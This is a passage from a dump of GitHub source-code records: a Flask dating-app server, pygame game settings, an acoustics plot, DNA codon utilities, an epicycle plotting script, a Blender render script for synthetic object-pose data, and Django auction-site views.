posts.insert_one(post_data)\r\n return {}\r\n\r\n@app.route(\"/chats\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef chats():\r\n db = DB_CLIENT[\"main\"]\r\n matches = db.matches\r\n user_data = request.data.decode(\"utf-8\")\r\n print(user_data)\r\n \r\n m = matches.find({\"id\":user_data}).limit(20)\r\n print(m[0])\r\n l = []\r\n for i in m:\r\n l.append(i)\r\n print(l, \"l\")\r\n return dumps(l)\r\n\r\n@app.route(\"/posts//like\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef like(id):\r\n user_id = request.data.decode(\"utf-8\")\r\n db = DB_CLIENT[\"main\"]\r\n user = db.likes.find_one({\"user\":user_id})\r\n post = db.posts.find_one({\"post_id\":id})\r\n if user and id in user[\"liked\"]:\r\n user[\"liked\"].remove(id)\r\n post[\"likes\"]-=1\r\n else:\r\n user[\"liked\"].append(id)\r\n post[\"likes\"]+=1\r\n db.likes.replace_one({\"user\":user_id},user)\r\n db.posts.replace_one({\"post_id\":id},post)\r\n return dumps(db.posts.find({}).limit(20))\r\n\r\n@app.route(\"/addChat\", methods = ['POST', 'PUT'])\r\n@cross_origin(supports_credentials=True)\r\ndef postChat():\r\n bdy = request.get_json()\r\n\r\n db = DB_CLIENT[\"main\"]\r\n matches = db.matches\r\n try:\r\n match_data = request.data.decode(\"utf-8\")\r\n match_data = json.loads(match_data)\r\n\r\n matches.replace_one({\"id\": match_data[\"id\"]},match_data, upsert=True)\r\n return dumps({\"message\":\"succeeded in updating db\"})\r\n except:\r\n return dumps({\"message\":\"error with updating to db. 
please try again\"})\r\n\r\nif __name__ == \"__main__\":\r\n app.run(\"127.0.0.1\")\r\n # socketio.run(app, debug=True,port=5000)","repo_name":"Delkik/Love-Track-Refactor","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73008292267","text":"# global constants\n\nimport pygame\n\n# program settings\nTITLE = 'Jetpack Goodride'\nICON_LOC = 'assets/sprites/icon.png'\nDEFAULT_FONT_LOC = 'assets/fonts/New Athletic M54.ttf'\nHIGH_SCORE_LOC = 'save/highscore.txt'\nWIDTH = 1280\nHEIGHT = 720\nFPS = 300\n\n# player settings\nDEFAULT_X_VELOCITY = 480\nMAX_X_VELOCITY = 690\nGRAVITY = 1.7\n\n# scenario settings\nFIRST_OBSTACLE_OFFSET = 1920\nOBSTACLE_OFFSET = 680 # 520-860\nMIN_OBSTACLE_OFFSET = 520\nMAX_OBSTACLE_OFFSET = 860\nMIN_HEIGHT = 645\nMAX_HEIGHT = 80\n# OBSTACLE_Y_POSITIONS = [190, 278, 365, 453, 540]\n\n# colors\nBLACK = pygame.color.Color(0, 0, 0)\nWHITE = pygame.color.Color(255, 255, 255)\nYELLOW = pygame.color.Color(255, 255, 0)\nYELLOW_COIN = pygame.color.Color(255, 189, 28)\n\n# audio\n# MUSIC_LOC_LIST = []\n\n# DEBUG\nDEBUG = False\nDEBUG_HIT_BOXES = True\nDEBUG_SCREEN_SIZE_BOX = True\n","repo_name":"Gustavo-Pauli/Jetpack-Goodride","sub_path":"scripts/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"36807690618","text":"from factualaudio.plot_format import format_spectrum\nimport factualaudio.iso9613 as iso9613\nimport numpy as np\n\ndef plot_air_attenuation(axes, temperature_celsius, relative_humidity_percentage, *args, **kwargs):\n ambient_pressure_kpa = 101.325 # Mean sea level pressure\n temperature_kelvin = iso9613.celsius_to_kelvin(temperature_celsius)\n water_concentration_percentage = iso9613.relative_humidity_to_water_concentration(\n ambient_pressure_kpa, relative_humidity_percentage, temperature_kelvin)\n x = np.linspace(20, 20000, num=1000)\n return axes.semilogx(\n x, -10*iso9613.atmospheric_absorption_coefficient(x, ambient_pressure_kpa, water_concentration_percentage, temperature_kelvin),\n label=str(temperature_celsius)+' °C; '+str(relative_humidity_percentage)+' %RH', *args, **kwargs)\n\ndef populate_figure(figure):\n axes = figure.add_subplot(1, 1, 1)\n plot_air_attenuation(axes, 10, 30, linestyle='--')\n plot_air_attenuation(axes, 20, 50)\n plot_air_attenuation(axes, 30, 70, linestyle='--')\n format_spectrum(figure)\n axes.legend(loc='lower left')\n axes.set_ylim(-6, 1)\n axes.set_ylabel('Gain over 10 meters (dB)')\n","repo_name":"factualaudio/factualaudio","sub_path":"python/factualaudio/plots/air_attenuation.py","file_name":"air_attenuation.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"33847681575","text":"def isStopCodon(dna):\n '''\n indicate if the given sequence is stop codon or not\n :param dna:\n :return: bool\n >>> isStopCodon('TAA')\n True\n >>> isStopCodon('tag')\n True\n >>> isStopCodon('ATC')\n False\n '''\n # stop codon = TAG, TGA, TAA\n dna = str(dna)\n if dna.upper() in ['TAG', 'TGA', 'TAA']:\n return True\n else:\n return False\n\n\ndef reverseComplement(dna):\n '''\n retrun reverse complement of given DNA sequence in uppercase letters\n :param dna:\n :return:\n >>> reverseComplement('AAGTC')\n 'GACTT'\n >>> reverseComplement('agcttcgt')\n 'ACGAAGCT'\n 
>>> reverseComplement('AGTCTTACGCTTA')\n 'TAAGCGTAAGACT'\n '''\n dna = reversed(list(dna.upper()))\n final = ''\n for i in dna:\n if i == 'A':\n i = 'T'\n elif i == 'G':\n i = 'C'\n elif i == 'C':\n i = 'G'\n else:\n i = 'A'\n final += i\n return final\n\n\ndef stopCodons(sequence, n):\n '''\n return number of stop codons in the given reading frame of the DNA sequence\n :param sequence:\n :param n:\n :return:\n >>> seq = 'TTTACTATAGTGATAGCCGGTAACATAGCTCCTAGAATAAAGGCAACGCAATACCCCTAGG'\n >>> stopCodons(seq, +1)\n 1\n >>> stopCodons(seq, +2)\n 5\n >>> stopCodons(seq, +3)\n 2\n >>> stopCodons(seq, -1)\n 3\n >>> stopCodons(seq, -2)\n 0\n >>> stopCodons(seq, -3)\n 1\n '''\n if n < 0:\n sequence = reverseComplement(sequence)\n sequence = sequence[abs(n)-1:]\n count = 0\n while True:\n if len(sequence) < 3:\n break\n current = sequence[:3]\n if isStopCodon(current):\n count += 1\n sequence = sequence[3:]\n return count\n\n\ndef codons(sequence, n):\n '''\n return string representation of splitting in codon\n :param sequence:\n :param n:\n :return:\n >>> seq = 'TTTACTATAGTGATAGCCGGTAACATAGCTCCTAGAATAAAGGCAACGCAATACCCCTAGG'\n >>> codons(seq, +1)\n 'TTT-ACT-ATA-GTG-ATA-GCC-GGT-AAC-ATA-GCT-CCT-AGA-ATA-AAG-GCA-ACG-CAA-TAC-CCC-TAG-G'\n >>> codons(seq, +2)\n 'T-TTA-CTA-TAG-TGA-TAG-CCG-GTA-ACA-TAG-CTC-CTA-GAA-TAA-AGG-CAA-CGC-AAT-ACC-CCT-AGG'\n >>> codons(seq, +3)\n 'TT-TAC-TAT-AGT-GAT-AGC-CGG-TAA-CAT-AGC-TCC-TAG-AAT-AAA-GGC-AAC-GCA-ATA-CCC-CTA-GG'\n >>> codons(seq, -1)\n 'CCT-AGG-GGT-ATT-GCG-TTG-CCT-TTA-TTC-TAG-GAG-CTA-TGT-TAC-CGG-CTA-TCA-CTA-TAG-TAA-A'\n >>> codons(seq, -2)\n 'C-CTA-GGG-GTA-TTG-CGT-TGC-CTT-TAT-TCT-AGG-AGC-TAT-GTT-ACC-GGC-TAT-CAC-TAT-AGT-AAA'\n >>> codons(seq, -3)\n 'CC-TAG-GGG-TAT-TGC-GTT-GCC-TTT-ATT-CTA-GGA-GCT-ATG-TTA-CCG-GCT-ATC-ACT-ATA-GTA-AA'\n '''\n if n < 0:\n sequence = reverseComplement(sequence)\n if sequence[:abs(n)-1]:\n l_sequence = [sequence[:abs(n)-1]]\n else:\n l_sequence = []\n sequence = sequence[abs(n)-1:]\n while True:\n if len(sequence) < 3:\n if sequence:\n l_sequence.append(sequence)\n break\n l_sequence.append(sequence[:3])\n sequence = sequence[3:]\n final = '-'.join(l_sequence)\n return final\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()","repo_name":"isk02206/python","sub_path":"informatics/partial-examination-term-1-august-2017-ga-hyun-choi/stop-codons.py","file_name":"stop-codons.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11590535488","text":"\"\"\"\nThis script combines all the output files made by epicycle_analysis.py (i.e. 
kappa.dat)\nfor different values of spin and plots them on the same graph.\nCall it from the directory containing the directories of each simulation with different spin.\n\"\"\"\n\nfrom bash import BASH\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom oscillation_frequencies import kappa, kappa_r0\n\nd_neg = BASH('ls -dr spin-neg*/').split('\\n')\nd_zer = BASH('ls -d spin-zero*/').split('\\n')\nd_pos = BASH('ls -d spin-pos*/').split('\\n')\ndirectories = d_neg+d_zer+d_pos\n\nfig_width_pt = 240*3 # Get this from LaTeX using \\showthe\\columnwidth\ninches_per_pt = 1.0/72.27 # Convert pt to inches\ngolden_mean = (np.sqrt(5)-1.0)/2.0 # Aesthetic ratio\nfig_width = fig_width_pt*inches_per_pt # width in inches\nfig_height = fig_width*golden_mean # height in inches\nfig_size = [fig_width,fig_width]\n# fig_size = [3.3208800332088004, 2.0524167330839185]\nplt.style.use('paper')\n\n# colormap = plt.cm.nipy_spectral #I suggest to use nipy_spectral, Set1,Paired\ncolormap = plt.cm.terrain\n# fig1 = plt.figure(1,figsize=(15,10))\n# fig2 = plt.figure(2,figsize=(15,10))\nfig1 = plt.figure(1)\nfig2 = plt.figure(2)\nax = fig1.add_subplot(111)\nax2= fig2.add_subplot(111)\nax.set_color_cycle([colormap(i) for i in np.linspace(0, 0.25,len(directories))])\nax2.set_color_cycle([colormap(i) for i in np.linspace(0, 0.25,len(directories))])\n\nfor d in directories:\n try:\n f = d+'kappa.dat'\n print('Loading: '+f)\n data = np.loadtxt(f)\n extraD = np.loadtxt(d+'extra-data-point/kappa.dat')\n data = np.concatenate((np.array([extraD]),data),axis=0)\n print(' |--> Success')\n except:\n print(' |--> Failed')\n continue\n i = 0\n for line in open(f):\n if i==0: a=float(line.strip(\"#\").strip())\n if i==1:\n df=float(line.strip(\"#\").strip())\n break\n i+=1\n r = data[:,0]\n k = data[:,1]\n k_exact = data[:,2]\n plt.figure(1)\n # p = plt.plot(r,k,'x')\n p = plt.errorbar(r,k,yerr=df/2,fmt='.')\n print(df/2./k_exact)\n c = p[0].get_color()\n # plt.plot(r,k_exact,label=\"a = \"+str(a),color=c)\n r0 = kappa_r0(a)\n rfine=np.linspace(r0,20.,500)\n plt.plot(rfine,kappa(rfine,a),label=r\"$a = $\"+str(a).rjust(4),color=c,lw=1)\n # plt.plot(rfine,kappa(rfine,a),label=\"a = \"+str(a),color='k')\n plt.figure(2)\n plt.plot(r,np.abs(kappa(r,a)-k)/kappa(r,a),'o-')\n\nplt.yscale('log')\nplt.figure(1)\n\n# plt.tick_params(axis='both', which='major', labelsize=lbfs)\nplt.xlabel(r'$r$')\nplt.ylabel(r'$\\kappa$')\nplt.xlim(xmax=20)\nplt.ylim(ymin=0)\nplt.legend(frameon=False,loc='upper right')\n# plt.tight_layout()\n\nplt.savefig('python_plot.pdf',bbox_inches='tight')\n\nplt.show()\n","repo_name":"phantomSPH/phantom-geodesic","sub_path":"scripts/epicycle_multi-spin.py","file_name":"epicycle_multi-spin.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74920093861","text":"import os, sys\nfrom os.path import join, dirname, basename, exists\nimport shutil\nimport bpy\nfrom mathutils import Matrix, Vector\nfrom PIL import Image\nfrom math import radians, sin, cos\nimport numpy as np\nimport random\nimport json\n\ncur_dir = dirname(os.path.abspath(__file__))\nsys.path.append(cur_dir)\nfrom image_utils import obtain_obj_center, one_mask_per_image, binary_mask\nfrom render_utils import remove_obj_lamp_and_mesh, setup_env, make_lamp, render_without_output\n\n\n# Transform the R and T from numpy array to Matrix\ndef convert_pose_array_to_matrix(R, T):\n mat = Matrix(R.reshape(3, 3)).to_4x4()\n mat.col[3][:3] = T\n return mat\n\n\n# 
Setup the camera\ndef setup_camera(scene, fx=572, fy=574, cx=325, cy=242):\n cam = scene.objects['Camera']\n width = scene.render.resolution_x\n height = scene.render.resolution_y\n cam.data.sensor_height = cam.data.sensor_width * height / width\n cam.data.lens = (fx + fy) / 2 * cam.data.sensor_width / width\n cam.data.shift_x = (width / 2 - cx) / width\n cam.data.shift_y = (cy - height / 2) / width\n # change to OpenCV camera coordinate system\n cam.matrix_world = Matrix(((1.0, 0.0, 0.0, 0.0),\n (0.0, -1.0, 0.0, 0.0),\n (0.0, 0.0, -1.0, 0.0),\n (0.0, 0.0, 0.0, 1.0)))\n return cam\n\n\n# Add material to object\ndef add_color(obj, color=(1., 0., 0.), shadeless=True):\n mat = bpy.data.materials.new(name='Material')\n mat.use_shadeless = shadeless\n mat.diffuse_color = color\n if obj.data.materials:\n obj.data.materials[0] = mat\n else:\n obj.data.materials.append(mat)\n\n\n# Add texture map to object\ndef add_texture_map(obj, texture_img):\n mat = bpy.data.materials.new(name='Material')\n tex = bpy.data.textures.new('UVMapping', 'IMAGE')\n tex.image = bpy.data.images.load(texture_img)\n slot = mat.texture_slots.add()\n slot.texture = tex\n if obj.data.materials:\n obj.data.materials[0] = mat\n else:\n obj.data.materials.append(mat)\n\n\n# Import 3D models from .obj files\ndef import_models(model_files, category, use_defalut_texture=False):\n models = {}\n textures = {}\n repeat_count = {}\n for i in range(len(model_files)):\n models[i] = {}\n model_file = model_files[i]\n bpy.ops.import_scene.obj(filepath=model_file)\n file_name = basename(model_file).split('.')[0]\n\n if category:\n model_name = join(basename(dirname(model_file)), file_name)\n else:\n model_name = file_name\n models[i]['model_name'] = model_name\n\n if file_name not in repeat_count.keys():\n repeat_count[file_name] = 0\n else:\n repeat_count[file_name] += 1\n models[i]['object_name'] = file_name if repeat_count[file_name] == 0 else '{}.{:03d}'.format(\n file_name, repeat_count[file_name])\n\n if use_defalut_texture:\n textures[model_name] = model_file.replace('.obj', '.png')\n return models, textures\n\n\n# Create random rotation matrix\ndef rand_rotation():\n # from http://www.realtimerendering.com/resources/GraphicsGems/gemsiii/rand_rotation.c\n\n theta, phi, z = np.random.uniform(size=(3,))\n theta = theta * 2.0 * np.pi # Rotation about the pole (Z).\n phi = phi * 2.0 * np.pi # For direction of pole deflection.\n z = z * 2.0 # For magnitude of pole deflection.\n\n # Compute a vector V used for distributing points over the sphere\n # via the reflection I - V Transpose(V). This formulation of V\n # will guarantee that if x[1] and x[2] are uniformly distributed,\n # the reflected points will be uniform on the sphere. 
Note that V\n # has length sqrt(2) to eliminate the 2 in the Householder matrix.\n\n r = np.sqrt(z)\n V = (\n np.sin(phi) * r,\n np.cos(phi) * r,\n np.sqrt(2.0 - z)\n )\n\n st = np.sin(theta)\n ct = np.cos(theta)\n\n R = np.array(((ct, st, 0), (-st, ct, 0), (0, 0, 1)))\n\n # Construct the rotation matrix ( V Transpose(V) - I ) R.\n\n M = (np.outer(V, V) - np.eye(3)).dot(R)\n return M\n\n\nclass RenderMachine:\n \"\"\"Creates a python blender render machine.\n\n model_files: a list containing all the obj files\n out_dir: where to save the render results\n table_file: 3D model of the table on which all objects could be placed\n hide_table: use the table model only when this arg is False\n texture_dir: directory containing the texture map images\n bg_dir: directory containing the background images\n dim_min: the minimum model dimension in mm\n dim_max: the maximum model dimension in mm\n grid: the distance between object models on the table\n rad: lamp radiance to adjust the lightness\n clip_end: rendering range in mm\n \"\"\"\n def __init__(self,\n model_files, out_dir, table_file='Platte.obj', texture_dir=None, bg_dir=None, category=False,\n dim_min=100, dim_max=150, rad=3000, clip_end=2000,\n fx=572, fy=574, cx=325, cy=242, height=480, width=640):\n # Setting up the environment\n remove_obj_lamp_and_mesh(bpy.context)\n self.scene = bpy.context.scene\n self.objs = bpy.data.objects\n self.depthFileOutput = setup_env(self.scene, True, False, height, width, clip_end)\n self.camera = setup_camera(self.scene, fx, fy, cx, cy)\n self.lamp = make_lamp(rad)\n self.rad = rad\n self.height, self.width = height, width\n self.fx, self.fy, self.cx, self.cy = fx, fy, cx, cy\n\n # Import table model and align it with camera frame\n bpy.ops.import_scene.obj(filepath=table_file)\n self.table = bpy.data.objects[basename(table_file).split('.')[0]]\n grid = np.random.uniform(dim_min, dim_max)\n self.offset = [0, -grid, grid, -2 * grid, 2 * grid, -3 * grid, 3 * grid]\n\n # Import 3D models and register dimension range\n model_files = random.choices(model_files, k=30) if len(model_files) > 30 else model_files\n self.models, self.textures = import_models(model_files, category)\n self.dim_min, self.dim_max = dim_min, dim_max\n\n # Read texture maps and the background images\n self.texture_dir = texture_dir\n self.textures = os.listdir(texture_dir)\n self.bg_dir = bg_dir\n self.bg_imgs = os.listdir(bg_dir)\n\n # Output setting\n self.out_dir = out_dir\n self.scene.render.image_settings.file_format = 'PNG'\n self.depthFileOutput.base_path = join(out_dir, 'depth')\n self.depthFileOutput.format.file_format = 'OPEN_EXR'\n\n # TODO: to modify in order to be complied with T-LESS where multiple objects are present\n def render_pose_from_annotation(self, idx, R, T):\n self.table.hide_render = True\n\n # Render object masks\n for i in range(len(self.models)):\n model = self.models[i]['object_name']\n if model in R:\n self.objs[model].hide_render = False\n self.objs[model].matrix_world = convert_pose_array_to_matrix(R[model], T[model])\n add_color(self.objs[model], color=((i + 1) * 0.01, (i + 1) * 0.01, (i + 1) * 0.01), shadeless=True)\n else:\n self.objs[model].hide_render = True\n\n self.scene.render.filepath = join(self.out_dir, '{:04d}_mask'.format(idx))\n self.depthFileOutput.file_slots[0].path = '{:04d}_depth_'.format(idx)\n render_without_output(use_antialiasing=False)\n\n # Render textured image and depth map\n for i in range(len(self.models)):\n model = self.models[i]['object_name']\n if model in R:\n 
add_texture_map(self.objs[model], self.textures[model])\n\n self.depthFileOutput.file_slots[0].path = '{:04d}_depth_'.format(idx)\n self.scene.render.filepath = join(self.out_dir, '{:04d}_image'.format(idx))\n render_without_output(use_antialiasing=True)\n\n def render_random_pose(self, annot, start_idx, scene_id, image_id, R, T, ele):\n \"\"\"\n Render objects under random poses\n :param annot: annotation dictionary\n :param start_idx:\n :param scene_id:\n :param image_id:\n :param R:\n :param T:\n :param ele:\n :return: annotation, rgb, mask, mask_visib, depth\n \"\"\"\n self.table.matrix_world = convert_pose_array_to_matrix(\n R, T + np.array([0, 200 * sin(radians(ele)), 200 * cos(radians(ele))])\n )\n self.table.scale = 6, 6, 6\n self.depthFileOutput.file_slots[0].path = '{:06d}_'.format(image_id)\n\n # Randomize the lamp energy\n self.lamp.data.energy = np.random.uniform(self.rad * 0.5, self.rad * 1.5) / 36\n\n # Render visible object masks\n Rotations, Translations, Scales = {}, {}, {}\n for i in range(len(self.models)):\n object = self.models[i]['object_name']\n R_model = rand_rotation()\n T_model = T + np.array(\n [self.offset[i % 5], sin(radians(ele)) * self.offset[i // 5], -cos(radians(ele)) * self.offset[i // 5]]\n )\n self.objs[object].matrix_world = convert_pose_array_to_matrix(R_model, T_model)\n add_color(self.objs[object], color=((i + 1) * 0.01, (i + 1) * 0.01, (i + 1) * 0.01), shadeless=True)\n scale = np.random.uniform(self.dim_min, self.dim_max) / max(self.objs[object].dimensions)\n self.objs[object].scale = scale, scale, scale\n Rotations[i], Translations[i], Scales[i] = R_model, T_model, scale\n\n add_color(self.table, color=(0, 0, 0), shadeless=True)\n self.scene.render.filepath = join(self.out_dir, 'mask_visib', '{:06d}'.format(image_id))\n render_without_output(use_antialiasing=False)\n bbox_visib, px_visib = one_mask_per_image(join(self.out_dir, 'mask_visib', '{:06d}.png'.format(image_id)),\n image_id, len(self.models))\n\n # Render amodal object masks\n bbox_amodal, px_amodal, truncated = [], [], []\n self.table.hide_render = True\n for i in range(len(self.models)):\n object = self.models[i]['object_name']\n self.objs[object].hide_render = True\n for i in range(len(self.models)):\n object = self.models[i]['object_name']\n self.objs[object].hide_render = False\n self.scene.render.filepath = join(self.out_dir, 'mask', '{:06d}_{:06d}'.format(image_id, i))\n render_without_output(use_antialiasing=False)\n bbox, px, trunc = binary_mask(join(self.out_dir, 'mask', '{:06d}_{:06d}.png'.format(image_id, i)))\n bbox_amodal.append(bbox)\n px_amodal.append(px)\n truncated.append(trunc)\n self.objs[object].hide_render = True\n\n # Render textured image and depth map\n self.table.hide_render = False\n for i in range(len(self.models)):\n object = self.models[i]['object_name']\n self.objs[object].hide_render = False\n for i in range(len(self.models)):\n object = self.models[i]['object_name']\n add_texture_map(self.objs[object], join(self.texture_dir, random.choice(self.textures)))\n\n # Generate the sample annotation\n if px_amodal[i] == 0 or px_visib[0] == 0:\n continue\n sample_frame = {}\n sample_frame[\"scene_id\"] = scene_id\n sample_frame[\"image_id\"] = image_id\n sample_frame[\"instance_id\"] = i\n\n sample_frame[\"model_name\"] = self.models[i]['model_name']\n sample_frame[\"scale\"] = Scales[i]\n sample_frame[\"cam_R_m2c\"] = list(Rotations[i].reshape(-1))\n sample_frame[\"cam_t_m2c\"] = list(Translations[i])\n cx, cy, inside = obtain_obj_center(Translations[i], self.fx, 
self.fy, self.cx, self.cy, self.height,\n self.width)\n sample_frame[\"obj_center\"] = [cx, cy]\n sample_frame[\"inside\"] = inside\n sample_frame[\"truncated\"] = truncated[i]\n sample_frame[\"bbox_obj\"] = bbox_amodal[i]\n sample_frame[\"bbox_visib\"] = bbox_visib[i]\n sample_frame[\"px_count_visib\"] = px_visib[i]\n sample_frame[\"visib_fract\"] = px_visib[i] / px_amodal[i]\n annot['{}'.format(start_idx + i)] = sample_frame\n\n add_texture_map(self.table, join(self.bg_dir, random.choice(self.bg_imgs)))\n self.scene.render.filepath = join(self.out_dir, 'rgb', '{:06d}'.format(image_id))\n render_without_output(use_antialiasing=True)\n\n # rename depth image\n shutil.move(join(self.depthFileOutput.base_path, '{:06d}_0001.exr'.format(image_id)),\n join(self.depthFileOutput.base_path, '{:06d}.exr'.format(image_id)))\n\n\nif __name__ == '__main__':\n import pandas as pd\n # input and output directory\n dataset_dir = '/home/xiao/Datasets/ABC'\n model_dir = join(dataset_dir, 'abc_0000')\n out_dir = join(dataset_dir, 'train_0000')\n scene_id = len(os.listdir(out_dir))\n out_dir = join(out_dir, '{:06d}'.format(scene_id))\n images_per_scene = 100\n\n # textures and backgrounds directory\n texture_dir = join(dirname(os.path.realpath(__file__)), 'textures')\n bg_dir = '/home/xiao/Datasets/PascalVOC/VOCdevkit/VOC2012/Images/JPEGImages'\n\n # TODO: consider mutilple instances of the same shape\n df = pd.read_csv(join(dataset_dir, 'abc_0000.txt'))\n df = df[df.ratio_max <= 5]\n df = df[df.ratio_min >= 0.2]\n model_number = np.random.randint(5, 25)\n idx = np.random.randint(0, len(df), size=(model_number,))\n model_files = [join(model_dir, '{}.obj'.format(df.iloc[i, 0])) for i in idx]\n\n render_machine = RenderMachine(model_files, out_dir, texture_dir=texture_dir, bg_dir=bg_dir, rad=3000)\n\n # Load table poses from the LINEMOD-OCCLUSION dataset\n table_poses = np.load('table_poses.npz')\n R = table_poses['R']\n T = table_poses['T']\n Ele = table_poses['Ele']\n idx = np.random.randint(0, R.shape[0], size=(images_per_scene,))\n\n # Read in annotation json file\n annotation_file = join(out_dir, 'scene_gt.json')\n annot = json.load(open(annotation_file)) if exists(annotation_file) else {}\n\n for i in range(len(idx)):\n start_idx = len(annot)\n render_machine.render_random_pose(annot, start_idx, scene_id, i, R[idx[i], :], T[idx[i], :], Ele[idx[i]])\n\n with open(annotation_file, 'w') as f:\n json.dump(annot, f, indent=4)\n\n os.system('rm blender_render.log')\n","repo_name":"YoungXIAO13/ObjectPoseEstimationSummary","sub_path":"blender_render/render_random_pose.py","file_name":"render_random_pose.py","file_ext":"py","file_size_in_byte":14542,"program_lang":"python","lang":"en","doc_type":"code","stars":663,"dataset":"github-code","pt":"35"} +{"seq_id":"72363403302","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.db import IntegrityError\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom django.utils import timezone\nfrom django.core.files.base import ContentFile\nimport requests\nfrom .models import User, Category, AuctionListing, Comment, Bid, Watchlist\nfrom decimal import Decimal\n\ndef index(request):\n return render(request, \"auctions/index.html\",{\n \"listings\" : AuctionListing.objects.all()\n })\n\ndef listing_page(request, list_id):\n listing_page = AuctionListing.objects.get(id = list_id)\n is_in_watchlist = False\n comments = 
Comment.objects.filter(listing=listing_page)\n comment_texts = [comment.comments for comment in comments]\n\n if request.user.is_authenticated:\n \n if Watchlist.objects.filter(watchlist=list_id, user=request.user):\n is_in_watchlist = True\n else:\n is_in_watchlist = False\n bid_by = Bid.objects.filter(bid_price=listing_page.current_price).last()\n if bid_by:\n bidder_user = bid_by.bidding_by\n else:\n bidder_user = None\n\n return render(request, \"auctions/listing_page.html\", {\n \"listing\" : listing_page ,\n \"is_in_watchlist\" : is_in_watchlist,\n \"owner_name\" : str(listing_page.owner).strip(),\n \"user_name\" : str(request.user.username).strip(),\n \"bid_by\" : str(bidder_user).strip(),\n \"comments\" : comment_texts\n })\n else:\n return render(request, \"auctions/listing_page.html\", {\n \"listing\" : listing_page ,\n \"is_in_watchlist\" : is_in_watchlist,\n \"owner_name\" : str(listing_page.owner).strip(),\n \"user_name\" : str(request.user.username).strip(),\n \"comments\" : comment_texts,\n })\n\n\n\ndef watchlist(request):\n if request.user.is_authenticated:\n user_watchlist = Watchlist.objects.filter(user=request.user)\n return render(request, \"auctions/watchlist.html\",{\n \"watchlistings\" : user_watchlist\n })\n\n\ndef add_watchlist(request, listing_id):\n if request.method == \"POST\":\n if request.user.is_authenticated:\n watchlist_page = AuctionListing.objects.get(id = listing_id)\n add_to_watchlist = Watchlist(watchlist=watchlist_page, user=request.user)\n add_to_watchlist.save()\n return redirect('listing_page', list_id=listing_id)\n else:\n return render(request, \"auctions/login.html\")\n \ndef remove_watchlist(request, listing_id):\n if request.method == \"POST\":\n if request.user.is_authenticated:\n watchlist_page = AuctionListing.objects.get(id = listing_id)\n get_from_watchlist = Watchlist.objects.get(watchlist=watchlist_page, user=request.user)\n get_from_watchlist.delete()\n return redirect('listing_page', list_id=listing_id)\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password) #In Django, registered users are typically saved in a database table called auth_user. 
This table is created and managed by Django's built-in authentication system and is part of the Django authentication framework.\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"auctions/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Username already taken.\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/register.html\")\n\ndef create(request):\n error_url = None\n if request.method == \"POST\":\n title = request.POST[\"title\"]\n description = request.POST[\"description\"]\n current_price = request.POST[\"current_price\"]\n category = Category.objects.get(id = int(request.POST[\"category\"]))\n image_url = request.POST[\"image\"]\n created_at = timezone.now\n owner = request.user\n \n try:\n image_request = requests.get(image_url, stream=True)\n image_request.raise_for_status()\n except requests.exceptions.RequestException as e:\n error_url = \"Re-Enter with the correct URL\"\n\n if error_url is not None:\n return render(request, \"auctions/create.html\", {\n \"error_url\" : error_url,\n \"categories\" : Category.objects.all()\n })\n else:\n listing = AuctionListing(title = title ,\n description = description,\n category = category,\n current_price = current_price, \n created_at = created_at,\n owner = owner,\n status = True)\n image_name = image_url.split(\"/\")[-1]\n image_content = ContentFile(image_request.content)\n listing.image.save(image_name, image_content, save=True)\n listing.save() \n return HttpResponseRedirect(reverse(\"index\"))\n\n else:\n return render(request, \"auctions/create.html\" ,{\n \"categories\" : Category.objects.all()\n })\n \ndef place_bid(request, listing_id):\n if request.method == \"POST\":\n if request.user.is_authenticated:\n new_price = request.POST[\"new_price\"]\n bid_by = request.user\n bid = Bid(bid_price=new_price, bidding_by=bid_by)\n bid.save()\n auction_listing = AuctionListing.objects.get(id=listing_id)\n if (Decimal(new_price) > auction_listing.current_price):\n auction_listing.current_price = new_price\n auction_listing.save()\n return redirect('listing_page', list_id=listing_id)\n else: \n listing_page = AuctionListing.objects.get(id = listing_id)\n is_in_watchlist = False\n if request.user.is_authenticated:\n if Watchlist.objects.filter(watchlist=listing_id, user=request.user):\n is_in_watchlist = True\n else:\n is_in_watchlist = False\n\n return render(request, \"auctions/listing_page.html\", {\n \"listing\" : listing_page ,\n \"is_in_watchlist\" : is_in_watchlist,\n \"owner_name\" : str(listing_page.owner).strip(),\n \"user_name\" : 
